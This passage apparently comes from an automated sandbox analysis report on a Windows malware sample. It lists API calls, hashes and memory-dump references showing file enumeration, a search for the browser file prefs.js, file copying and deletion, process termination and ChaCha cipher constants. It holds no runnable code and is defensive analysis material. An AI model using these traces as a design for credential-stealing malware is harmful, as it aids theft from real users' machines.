                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 180737720-4073750446
                                            • Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                            • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                            • Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                            • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02464A37
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02464A3E
                                            • wsprintfA.USER32 ref: 02464A5D
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02464A74
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 02464AA2
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02464AB8
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02464B42
                                            • FindClose.KERNEL32(000000FF), ref: 02464B57
                                            • lstrcat.KERNEL32(?,006D6F24), ref: 02464B7C
                                            • lstrcat.KERNEL32(?,006D6C2C), ref: 02464B8F
                                            • lstrlen.KERNEL32(?), ref: 02464B9C
                                            • lstrlen.KERNEL32(?), ref: 02464BAD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                            • String ID:
                                            • API String ID: 671575355-0
                                            • Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                            • Instruction ID: bf62fe5eb109ae445943dcf6904a98396da2749920c0b698165030790188f201
                                            • Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                            • Instruction Fuzzy Hash: 925169B1944218ABCB24EB70DC88FE9737DAF58700F4046CAF64D96190EB759784CF52
                                            APIs
                                            • wsprintfA.USER32 ref: 0246437A
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02464391
                                            • StrCmpCA.SHLWAPI(?,00420F94), ref: 024643BF
                                            • StrCmpCA.SHLWAPI(?,00420F98), ref: 024643D5
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02464523
                                            • FindClose.KERNEL32(000000FF), ref: 02464538
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                            • Instruction ID: 46082b5afaf0d3f8c382e95d9bd7f92e58e94091df78a8412e1c5dfd68b37a2e
                                            • Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                            • Instruction Fuzzy Hash: 155154B1904228ABCB24EB70DD89EFA737DBF54300F4446CEB64996050EB759B88CF51
                                            APIs
                                            • wsprintfA.USER32 ref: 0040EE3E
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                            • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                            • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                            • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\*.*
                                            • API String ID: 180737720-1013718255
                                            • Opcode ID: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                            • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                            • Opcode Fuzzy Hash: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                            • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                            • API String ID: 0-1562099544
                                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                            • Instruction ID: 919dcdaddd5eab065bb3107cefc1fd4e263cd5fdb2a8e5fcdfae6892e423397b
                                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                            • Instruction Fuzzy Hash: 2FE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                            • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                            • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID: 4@$\*.*
                                            • API String ID: 2325840235-1993203227
                                            • Opcode ID: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                            • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                            • Opcode Fuzzy Hash: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                            • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                            • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                            • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
                                            • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: prefs.js
                                            • API String ID: 3334442632-3783873740
                                            • Opcode ID: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                            • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                            • Opcode Fuzzy Hash: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                            • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
                                            • StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
                                            • StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                            • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                            • FindClose.KERNEL32(000000FF), ref: 00401E72
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 1415058207-1173974218
                                            • Opcode ID: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                            • Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
                                            • Opcode Fuzzy Hash: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                            • Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                            APIs
                                            • wsprintfA.USER32 ref: 0245F0A5
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0245F0BC
                                            • StrCmpCA.SHLWAPI(?,00421630), ref: 0245F112
                                            • StrCmpCA.SHLWAPI(?,00421634), ref: 0245F128
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245F615
                                            • FindClose.KERNEL32(000000FF), ref: 0245F62A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                            • Instruction ID: fb6c3bf2f5e24e4617d5225079a52fc444f58763757f03723ea5b596cd3d3174
                                            • Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                            • Instruction Fuzzy Hash: 7BE1ED72901628AADB18EB61DC58EFE733AAF54301F4045EEA44A72091EF305F89CF52
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                            • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                            • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
                                            • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                            • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                            • Opcode Fuzzy Hash: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                            • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0245DE52
                                            • StrCmpCA.SHLWAPI(?,004215AC), ref: 0245DE9A
                                            • StrCmpCA.SHLWAPI(?,004215B0), ref: 0245DEB0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245E133
                                            • FindClose.KERNEL32(000000FF), ref: 0245E145
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                            • Instruction ID: 49a280d372716c7df81026523be2b6183a80364afa1a95f03732ab9e52a14c5c
                                            • Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                            • Instruction Fuzzy Hash: 8D913572A00624ABCB14FBB5DD59DFD737AAF94301F0045AEE84A66150EE349B48CF92
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0245FA85
                                            • StrCmpCA.SHLWAPI(?,004216B4), ref: 0245FAD6
                                            • StrCmpCA.SHLWAPI(?,004216B8), ref: 0245FAEC
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245FE18
                                            • FindClose.KERNEL32(000000FF), ref: 0245FE2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                            • Instruction ID: 0cca93f6508a03ef29d3dc19e33248bff747394d86b89daa1d7ac699b309dc57
                                            • Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                            • Instruction Fuzzy Hash: F4B120719006289BCB28FB65DC98EFE737AAF55300F4045AED84A66151EF309F49CF92
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                            • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                            • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                            • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                            • CloseHandle.KERNEL32(00000000), ref: 00419987
                                            • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                            • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02469B6C
                                            • Process32First.KERNEL32(0245A245,00000128), ref: 02469B80
                                            • Process32Next.KERNEL32(0245A245,00000128), ref: 02469B95
                                            • StrCmpCA.SHLWAPI(?,0245A245), ref: 02469BAA
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02469BC3
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 02469BE1
                                            • CloseHandle.KERNEL32(00000000), ref: 02469BEE
                                            • CloseHandle.KERNEL32(0245A245), ref: 02469BFA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction ID: 0ff963e2fb10c29b549f4fe5e5cf71e4c114fd9692c86f4b87961af37d2f3ea8
                                            • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction Fuzzy Hash: F0111F75D05219EBCB24DFA5DC88BEE7779BB48704F008589F505A6240E7749B84CF51
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                            • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                            • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                             Memory Dump Source
                                             • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID: \*.*$@
                                            • API String ID: 433455689-2355794846
                                            • Opcode ID: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                            • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                            • Opcode Fuzzy Hash: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                            • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,?,?,004252EC,?,?,00000000,?,00000000), ref: 02451BCA
                                            • StrCmpCA.SHLWAPI(?,00425394), ref: 02451C1A
                                            • StrCmpCA.SHLWAPI(?,0042543C), ref: 02451C30
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02451FE7
                                            • DeleteFileA.KERNEL32(00000000), ref: 02452071
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 024520C7
                                            • FindClose.KERNEL32(000000FF), ref: 024520D9
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 1415058207-0
                                            • Opcode ID: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
